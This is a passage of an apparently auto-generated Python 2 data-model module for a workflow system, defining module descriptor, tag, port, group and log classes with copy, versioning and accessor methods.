self.db_portSpecs_id_index[portSpec.db_id] = portSpec
self.db_portSpecs_name_index[(portSpec.db_name,portSpec.db_type)] = portSpec
def db_delete_portSpec(self, portSpec):
self.is_dirty = True
for i in xrange(len(self._db_portSpecs)):
if self._db_portSpecs[i].db_id == portSpec.db_id:
if not self._db_portSpecs[i].is_new:
self.db_deleted_portSpecs.append(self._db_portSpecs[i])
del self._db_portSpecs[i]
break
del self.db_portSpecs_id_index[portSpec.db_id]
del self.db_portSpecs_name_index[(portSpec.db_name,portSpec.db_type)]
def db_get_portSpec(self, key):
for i in xrange(len(self._db_portSpecs)):
if self._db_portSpecs[i].db_id == key:
return self._db_portSpecs[i]
return None
def db_get_portSpec_by_id(self, key):
return self.db_portSpecs_id_index[key]
def db_has_portSpec_with_id(self, key):
return key in self.db_portSpecs_id_index
def db_get_portSpec_by_name(self, key):
return self.db_portSpecs_name_index[key]
def db_has_portSpec_with_name(self, key):
return key in self.db_portSpecs_name_index
def getPrimaryKey(self):
return self._db_id
class DBModuleDescriptor(object):
vtType = 'module_descriptor'
def __init__(self, id=None, name=None, package=None, namespace=None, version=None, base_descriptor_id=None, portSpecs=None):
self._db_id = id
self._db_name = name
self._db_package = package
self._db_namespace = namespace
self._db_version = version
self._db_base_descriptor_id = base_descriptor_id
self.db_deleted_portSpecs = []
self.db_portSpecs_id_index = {}
self.db_portSpecs_name_index = {}
if portSpecs is None:
self._db_portSpecs = []
else:
self._db_portSpecs = portSpecs
for v in self._db_portSpecs:
self.db_portSpecs_id_index[v.db_id] = v
self.db_portSpecs_name_index[(v.db_name,v.db_type)] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBModuleDescriptor.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBModuleDescriptor(id=self._db_id,
name=self._db_name,
package=self._db_package,
namespace=self._db_namespace,
version=self._db_version,
base_descriptor_id=self._db_base_descriptor_id)
if self._db_portSpecs is None:
cp._db_portSpecs = []
else:
cp._db_portSpecs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_portSpecs]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_base_descriptor_id') and ('module_descriptor', self._db_base_descriptor_id) in id_remap:
cp._db_base_descriptor_id = id_remap[('module_descriptor', self._db_base_descriptor_id)]
# recreate indices and set flags
cp.db_portSpecs_id_index = dict((v.db_id, v) for v in cp._db_portSpecs)
cp.db_portSpecs_name_index = dict(((v.db_name,v.db_type), v) for v in cp._db_portSpecs)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBModuleDescriptor()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'package' in class_dict:
res = class_dict['package'](old_obj, trans_dict)
new_obj.db_package = res
elif hasattr(old_obj, 'db_package') and old_obj.db_package is not None:
new_obj.db_package = old_obj.db_package
if 'namespace' in class_dict:
res = class_dict['namespace'](old_obj, trans_dict)
new_obj.db_namespace = res
elif hasattr(old_obj, 'db_namespace') and old_obj.db_namespace is not None:
new_obj.db_namespace = old_obj.db_namespace
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'base_descriptor_id' in class_dict:
res = class_dict['base_descriptor_id'](old_obj, trans_dict)
new_obj.db_base_descriptor_id = res
elif hasattr(old_obj, 'db_base_descriptor_id') and old_obj.db_base_descriptor_id is not None:
new_obj.db_base_descriptor_id = old_obj.db_base_descriptor_id
if 'portSpecs' in class_dict:
res = class_dict['portSpecs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_portSpec(obj)
elif hasattr(old_obj, 'db_portSpecs') and old_obj.db_portSpecs is not None:
for obj in old_obj.db_portSpecs:
new_obj.db_add_portSpec(DBPortSpec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_portSpecs') and hasattr(new_obj, 'db_deleted_portSpecs'):
for obj in old_obj.db_deleted_portSpecs:
n_obj = DBPortSpec.update_version(obj, trans_dict)
new_obj.db_deleted_portSpecs.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_portSpecs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_portSpec(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_portSpecs)
if remove:
self.db_deleted_portSpecs = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_portSpecs:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_package(self):
return self._db_package
def __set_db_package(self, package):
self._db_package = package
self.is_dirty = True
db_package = property(__get_db_package, __set_db_package)
def db_add_package(self, package):
self._db_package = package
def db_change_package(self, package):
self._db_package = package
def db_delete_package(self, package):
self._db_package = None
def __get_db_namespace(self):
return self._db_namespace
def __set_db_namespace(self, namespace):
self._db_namespace = namespace
self.is_dirty = True
db_namespace = property(__get_db_namespace, __set_db_namespace)
def db_add_namespace(self, namespace):
self._db_namespace = namespace
def db_change_namespace(self, namespace):
self._db_namespace = namespace
def db_delete_namespace(self, namespace):
self._db_namespace = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_base_descriptor_id(self):
return self._db_base_descriptor_id
def __set_db_base_descriptor_id(self, base_descriptor_id):
self._db_base_descriptor_id = base_descriptor_id
self.is_dirty = True
db_base_descriptor_id = property(__get_db_base_descriptor_id, __set_db_base_descriptor_id)
def db_add_base_descriptor_id(self, base_descriptor_id):
self._db_base_descriptor_id = base_descriptor_id
def db_change_base_descriptor_id(self, base_descriptor_id):
self._db_base_descriptor_id = base_descriptor_id
def db_delete_base_descriptor_id(self, base_descriptor_id):
self._db_base_descriptor_id = None
def __get_db_portSpecs(self):
return self._db_portSpecs
def __set_db_portSpecs(self, portSpecs):
self._db_portSpecs = portSpecs
self.is_dirty = True
db_portSpecs = property(__get_db_portSpecs, __set_db_portSpecs)
def db_get_portSpecs(self):
return self._db_portSpecs
def db_add_portSpec(self, portSpec):
self.is_dirty = True
self._db_portSpecs.append(portSpec)
self.db_portSpecs_id_index[portSpec.db_id] = portSpec
self.db_portSpecs_name_index[(portSpec.db_name,portSpec.db_type)] = portSpec
def db_change_portSpec(self, portSpec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_portSpecs)):
if self._db_portSpecs[i].db_id == portSpec.db_id:
self._db_portSpecs[i] = portSpec
found = True
break
if not found:
self._db_portSpecs.append(portSpec)
self.db_portSpecs_id_index[portSpec.db_id] = portSpec
self.db_portSpecs_name_index[(portSpec.db_name,portSpec.db_type)] = portSpec
def db_delete_portSpec(self, portSpec):
self.is_dirty = True
for i in xrange(len(self._db_portSpecs)):
if self._db_portSpecs[i].db_id == portSpec.db_id:
if not self._db_portSpecs[i].is_new:
self.db_deleted_portSpecs.append(self._db_portSpecs[i])
del self._db_portSpecs[i]
break
del self.db_portSpecs_id_index[portSpec.db_id]
del self.db_portSpecs_name_index[(portSpec.db_name,portSpec.db_type)]
def db_get_portSpec(self, key):
for i in xrange(len(self._db_portSpecs)):
if self._db_portSpecs[i].db_id == key:
return self._db_portSpecs[i]
return None
def db_get_portSpec_by_id(self, key):
return self.db_portSpecs_id_index[key]
def db_has_portSpec_with_id(self, key):
return key in self.db_portSpecs_id_index
def db_get_portSpec_by_name(self, key):
return self.db_portSpecs_name_index[key]
def db_has_portSpec_with_name(self, key):
return key in self.db_portSpecs_name_index
def getPrimaryKey(self):
return self._db_id
class DBTag(object):
vtType = 'tag'
def __init__(self, id=None, name=None):
self._db_id = id
self._db_name = name
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBTag.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBTag(id=self._db_id,
name=self._db_name)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_id') and ('action', self._db_id) in id_remap:
cp._db_id = id_remap[('action', self._db_id)]
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBTag()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def getPrimaryKey(self):
return self._db_id
class DBPort(object):
vtType = 'port'
def __init__(self, id=None, type=None, moduleId=None, moduleName=None, name=None, signature=None):
self._db_id = id
self._db_type = type
self._db_moduleId = moduleId
self._db_moduleName = moduleName
self._db_name = name
self._db_signature = signature
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBPort.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBPort(id=self._db_id,
type=self._db_type,
moduleId=self._db_moduleId,
moduleName=self._db_moduleName,
name=self._db_name,
signature=self._db_signature)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_moduleId') and ('module', self._db_moduleId) in id_remap:
cp._db_moduleId = id_remap[('module', self._db_moduleId)]
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBPort()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'type' in class_dict:
res = class_dict['type'](old_obj, trans_dict)
new_obj.db_type = res
elif hasattr(old_obj, 'db_type') and old_obj.db_type is not None:
new_obj.db_type = old_obj.db_type
if 'moduleId' in class_dict:
res = class_dict['moduleId'](old_obj, trans_dict)
new_obj.db_moduleId = res
elif hasattr(old_obj, 'db_moduleId') and old_obj.db_moduleId is not None:
new_obj.db_moduleId = old_obj.db_moduleId
if 'moduleName' in class_dict:
res = class_dict['moduleName'](old_obj, trans_dict)
new_obj.db_moduleName = res
elif hasattr(old_obj, 'db_moduleName') and old_obj.db_moduleName is not None:
new_obj.db_moduleName = old_obj.db_moduleName
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'signature' in class_dict:
res = class_dict['signature'](old_obj, trans_dict)
new_obj.db_signature = res
elif hasattr(old_obj, 'db_signature') and old_obj.db_signature is not None:
new_obj.db_signature = old_obj.db_signature
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_type(self):
return self._db_type
def __set_db_type(self, type):
self._db_type = type
self.is_dirty = True
db_type = property(__get_db_type, __set_db_type)
def db_add_type(self, type):
self._db_type = type
def db_change_type(self, type):
self._db_type = type
def db_delete_type(self, type):
self._db_type = None
def __get_db_moduleId(self):
return self._db_moduleId
def __set_db_moduleId(self, moduleId):
self._db_moduleId = moduleId
self.is_dirty = True
db_moduleId = property(__get_db_moduleId, __set_db_moduleId)
def db_add_moduleId(self, moduleId):
self._db_moduleId = moduleId
def db_change_moduleId(self, moduleId):
self._db_moduleId = moduleId
def db_delete_moduleId(self, moduleId):
self._db_moduleId = None
def __get_db_moduleName(self):
return self._db_moduleName
def __set_db_moduleName(self, moduleName):
self._db_moduleName = moduleName
self.is_dirty = True
db_moduleName = property(__get_db_moduleName, __set_db_moduleName)
def db_add_moduleName(self, moduleName):
self._db_moduleName = moduleName
def db_change_moduleName(self, moduleName):
self._db_moduleName = moduleName
def db_delete_moduleName(self, moduleName):
self._db_moduleName = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_signature(self):
return self._db_signature
def __set_db_signature(self, signature):
self._db_signature = signature
self.is_dirty = True
db_signature = property(__get_db_signature, __set_db_signature)
def db_add_signature(self, signature):
self._db_signature = signature
def db_change_signature(self, signature):
self._db_signature = signature
def db_delete_signature(self, signature):
self._db_signature = None
def getPrimaryKey(self):
return self._db_id
class DBGroup(object):
vtType = 'group'
def __init__(self, id=None, workflow=None, cache=None, name=None, namespace=None, package=None, version=None, tag=None, location=None, functions=None, annotations=None):
self._db_id = id
self.db_deleted_workflow = []
self._db_workflow = workflow
self._db_cache = cache
self._db_name = name
self._db_namespace = namespace
self._db_package = package
self._db_version = version
self._db_tag = tag
self.db_deleted_location = []
self._db_location = location
self.db_deleted_functions = []
self.db_functions_id_index = {}
if functions is None:
self._db_functions = []
else:
self._db_functions = functions
for v in self._db_functions:
self.db_functions_id_index[v.db_id] = v
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
self.db_annotations_key_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_annotations_key_index[v.db_key] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBGroup.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBGroup(id=self._db_id,
cache=self._db_cache,
name=self._db_name,
namespace=self._db_namespace,
package=self._db_package,
version=self._db_version,
tag=self._db_tag)
if self._db_workflow is not None:
cp._db_workflow = self._db_workflow.do_copy()
if self._db_location is not None:
cp._db_location = self._db_location.do_copy(new_ids, id_scope, id_remap)
if self._db_functions is None:
cp._db_functions = []
else:
cp._db_functions = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_functions]
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_functions_id_index = dict((v.db_id, v) for v in cp._db_functions)
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_annotations_key_index = dict((v.db_key, v) for v in cp._db_annotations)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBGroup()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'workflow' in class_dict:
res = class_dict['workflow'](old_obj, trans_dict)
new_obj.db_workflow = res
elif hasattr(old_obj, 'db_workflow') and old_obj.db_workflow is not None:
obj = old_obj.db_workflow
new_obj.db_add_workflow(DBWorkflow.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_workflow') and hasattr(new_obj, 'db_deleted_workflow'):
for obj in old_obj.db_deleted_workflow:
n_obj = DBWorkflow.update_version(obj, trans_dict)
new_obj.db_deleted_workflow.append(n_obj)
if 'cache' in class_dict:
res = class_dict['cache'](old_obj, trans_dict)
new_obj.db_cache = res
elif hasattr(old_obj, 'db_cache') and old_obj.db_cache is not None:
new_obj.db_cache = old_obj.db_cache
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'namespace' in class_dict:
res = class_dict['namespace'](old_obj, trans_dict)
new_obj.db_namespace = res
elif hasattr(old_obj, 'db_namespace') and old_obj.db_namespace is not None:
new_obj.db_namespace = old_obj.db_namespace
if 'package' in class_dict:
res = class_dict['package'](old_obj, trans_dict)
new_obj.db_package = res
elif hasattr(old_obj, 'db_package') and old_obj.db_package is not None:
new_obj.db_package = old_obj.db_package
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'tag' in class_dict:
res = class_dict['tag'](old_obj, trans_dict)
new_obj.db_tag = res
elif hasattr(old_obj, 'db_tag') and old_obj.db_tag is not None:
new_obj.db_tag = old_obj.db_tag
if 'location' in class_dict:
res = class_dict['location'](old_obj, trans_dict)
new_obj.db_location = res
elif hasattr(old_obj, 'db_location') and old_obj.db_location is not None:
obj = old_obj.db_location
new_obj.db_add_location(DBLocation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_location') and hasattr(new_obj, 'db_deleted_location'):
for obj in old_obj.db_deleted_location:
n_obj = DBLocation.update_version(obj, trans_dict)
new_obj.db_deleted_location.append(n_obj)
if 'functions' in class_dict:
res = class_dict['functions'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_function(obj)
elif hasattr(old_obj, 'db_functions') and old_obj.db_functions is not None:
for obj in old_obj.db_functions:
new_obj.db_add_function(DBFunction.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_functions') and hasattr(new_obj, 'db_deleted_functions'):
for obj in old_obj.db_deleted_functions:
n_obj = DBFunction.update_version(obj, trans_dict)
new_obj.db_deleted_functions.append(n_obj)
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
if self._db_location is not None:
children.extend(self._db_location.db_children((self.vtType, self.db_id), orphan))
if orphan:
self._db_location = None
to_del = []
for child in self.db_functions:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_function(child)
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_workflow)
children.extend(self.db_deleted_location)
children.extend(self.db_deleted_functions)
children.extend(self.db_deleted_annotations)
if remove:
self.db_deleted_workflow = []
self.db_deleted_location = []
self.db_deleted_functions = []
self.db_deleted_annotations = []
return children
def has_changes(self):
if self.is_dirty:
return True
if self._db_workflow is not None and self._db_workflow.has_changes():
return True
if self._db_location is not None and self._db_location.has_changes():
return True
for child in self._db_functions:
if child.has_changes():
return True
for child in self._db_annotations:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_workflow(self):
return self._db_workflow
def __set_db_workflow(self, workflow):
self._db_workflow = workflow
self.is_dirty = True
db_workflow = property(__get_db_workflow, __set_db_workflow)
def db_add_workflow(self, workflow):
self._db_workflow = workflow
def db_change_workflow(self, workflow):
self._db_workflow = workflow
def db_delete_workflow(self, workflow):
if not self.is_new:
self.db_deleted_workflow.append(self._db_workflow)
self._db_workflow = None
def __get_db_cache(self):
return self._db_cache
def __set_db_cache(self, cache):
self._db_cache = cache
self.is_dirty = True
db_cache = property(__get_db_cache, __set_db_cache)
def db_add_cache(self, cache):
self._db_cache = cache
def db_change_cache(self, cache):
self._db_cache = cache
def db_delete_cache(self, cache):
self._db_cache = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_namespace(self):
return self._db_namespace
def __set_db_namespace(self, namespace):
self._db_namespace = namespace
self.is_dirty = True
db_namespace = property(__get_db_namespace, __set_db_namespace)
def db_add_namespace(self, namespace):
self._db_namespace = namespace
def db_change_namespace(self, namespace):
self._db_namespace = namespace
def db_delete_namespace(self, namespace):
self._db_namespace = None
def __get_db_package(self):
return self._db_package
def __set_db_package(self, package):
self._db_package = package
self.is_dirty = True
db_package = property(__get_db_package, __set_db_package)
def db_add_package(self, package):
self._db_package = package
def db_change_package(self, package):
self._db_package = package
def db_delete_package(self, package):
self._db_package = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_tag(self):
return self._db_tag
def __set_db_tag(self, tag):
self._db_tag = tag
self.is_dirty = True
db_tag = property(__get_db_tag, __set_db_tag)
def db_add_tag(self, tag):
self._db_tag = tag
def db_change_tag(self, tag):
self._db_tag = tag
def db_delete_tag(self, tag):
self._db_tag = None
def __get_db_location(self):
return self._db_location
def __set_db_location(self, location):
self._db_location = location
self.is_dirty = True
db_location = property(__get_db_location, __set_db_location)
def db_add_location(self, location):
self._db_location = location
def db_change_location(self, location):
self._db_location = location
def db_delete_location(self, location):
if not self.is_new:
self.db_deleted_location.append(self._db_location)
self._db_location = None
def __get_db_functions(self):
return self._db_functions
def __set_db_functions(self, functions):
self._db_functions = functions
self.is_dirty = True
db_functions = property(__get_db_functions, __set_db_functions)
def db_get_functions(self):
return self._db_functions
def db_add_function(self, function):
self.is_dirty = True
self._db_functions.append(function)
self.db_functions_id_index[function.db_id] = function
def db_change_function(self, function):
self.is_dirty = True
found = False
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == function.db_id:
self._db_functions[i] = function
found = True
break
if not found:
self._db_functions.append(function)
self.db_functions_id_index[function.db_id] = function
def db_delete_function(self, function):
self.is_dirty = True
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == function.db_id:
if not self._db_functions[i].is_new:
self.db_deleted_functions.append(self._db_functions[i])
del self._db_functions[i]
break
del self.db_functions_id_index[function.db_id]
def db_get_function(self, key):
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == key:
return self._db_functions[i]
return None
def db_get_function_by_id(self, key):
return self.db_functions_id_index[key]
def db_has_function_with_id(self, key):
return key in self.db_functions_id_index
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
del self.db_annotations_key_index[annotation.db_key]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def db_get_annotation_by_key(self, key):
return self.db_annotations_key_index[key]
def db_has_annotation_with_key(self, key):
return key in self.db_annotations_key_index
def getPrimaryKey(self):
return self._db_id
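# DBLog collects execution provenance for a vistrail: a list of
# workflow_exec children and a list of machine children, each mirrored by
# an id index, plus a vistrail_id back-reference. A minimal construction
# sketch, using only classes defined in this module (the ids are
# hypothetical; note the module targets Python 2, e.g. its use of xrange):
#
#     log = DBLog(id=0, vistrail_id=7)
#     log.db_add_machine(DBMachine(id=1, name='node-1', os='linux'))
#     assert log.db_has_machine_with_id(1)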
class DBLog(object):
vtType = 'log'
def __init__(self, id=None, entity_type=None, version=None, name=None, last_modified=None, workflow_execs=None, machines=None, vistrail_id=None):
self._db_id = id
self._db_entity_type = entity_type
self._db_version = version
self._db_name = name
self._db_last_modified = last_modified
self.db_deleted_workflow_execs = []
self.db_workflow_execs_id_index = {}
if workflow_execs is None:
self._db_workflow_execs = []
else:
self._db_workflow_execs = workflow_execs
for v in self._db_workflow_execs:
self.db_workflow_execs_id_index[v.db_id] = v
self.db_deleted_machines = []
self.db_machines_id_index = {}
if machines is None:
self._db_machines = []
else:
self._db_machines = machines
for v in self._db_machines:
self.db_machines_id_index[v.db_id] = v
self._db_vistrail_id = vistrail_id
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBLog.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBLog(id=self._db_id,
entity_type=self._db_entity_type,
version=self._db_version,
name=self._db_name,
last_modified=self._db_last_modified,
vistrail_id=self._db_vistrail_id)
if self._db_workflow_execs is None:
cp._db_workflow_execs = []
else:
cp._db_workflow_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_workflow_execs]
if self._db_machines is None:
cp._db_machines = []
else:
cp._db_machines = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_machines]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
